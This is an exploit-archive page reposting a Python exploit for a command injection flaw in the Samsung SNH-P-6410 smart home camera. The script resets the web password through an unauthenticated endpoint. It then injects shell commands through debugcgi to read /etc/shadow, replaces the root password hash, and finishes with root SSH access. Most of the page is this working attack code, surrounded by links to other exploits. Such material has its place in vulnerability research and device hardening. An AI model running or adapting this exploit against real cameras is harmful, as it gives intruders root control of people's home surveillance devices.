首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Samsung Smart Home Camera SNH-P-6410 - Command Injection 来源：https://www.pentestpartners.com 作者：PentestPartners 发布时间：2016-08-15   # E-DB Note: source ~ https://www.pentestpartners.com/blog/samsungs-smart-camera-a-tale-of-iot-network-security/   import urllib, urllib2, crypt, time   # New password for web interface web_password    = 'admin' # New password for root root_password   = 'root' # IP of the camera ip          = '192.168.12.61'   # These are all for the Smartthings bundled camera realm = 'iPolis' web_username = 'admin' base_url = 'http://' + ip + '/cgi-bin/adv/debugcgi?msubmenu=shell&command=ls&command_arg=/...;'     # Take a command and use command injection to run it on the device def run_command(command):     # Convert a normal command into one using bash brace expansion     # Can't send spaces to debugcgi as it doesn't unescape     command_brace = '{' + ','.join(command.split(' ')) + '}'     command_url = base_url + command_brace       # HTTP digest auth for urllib2     authhandler = urllib2.HTTPDigestAuthHandler()     authhandler.add_password(realm, command_url, web_username, web_password)     opener = urllib2.build_opener(authhandler)     urllib2.install_opener(opener)       return urllib2.urlopen(command_url)   # Step 1 - change the web password using the unauthed vuln found by zenofex data = urllib.urlencode({ 'data' : 'NEW;' + web_password }) urllib2.urlopen('http://' + ip + '/classes/class_admin_privatekey.php', data)   # Need to sleep or the password isn't changed time.sleep(1)   # Step 2 - find the current root password hash shadow = run_command('cat /etc/shadow')   for line in shadow:     if line.startswith('root:'):         current_hash = line.split(':')[1]   # Crypt the new password new_hash = crypt.crypt(root_password, '00')   # Step 3 - Use sed to search and replace the old for new hash in the passwd # This is done because the command injection doesn't allow a lot of different URL encoded chars run_command('sed -i -e s/' + current_hash + '/' + new_hash + '/g /etc/shadow')   # Step 4 - check that the password has changed shadow = run_command('cat /etc/shadow')   for line in shadow:     if line.startswith('root:'):         current_hash = line.split(':')[1]   if current_hash <> new_hash:     print 'Error! - password not changed'   # Step 5 - ssh to port 1022 with new root password!   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·FreePBX 13 / 14 - Remote Comma ·Actiontec T2200H Remote Revers ·WebNMS Framework Server 5.2 Ar ·Google Chrome 26.0.1410.43 (We ·DLL Side Loading In VMware Hos ·Internet Explorer - MSHTML!CMu ·NUUO NVRmini 2 / NETGEAR Ready ·Metasploit Service Persistence ·NUUO NVRmini 2 / Crystal / NET ·Metasploit Cron Persistence Mo ·Netcore Router Udp 53413 Backd ·SIEMENS IP Camera CCMW1025 x.2   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved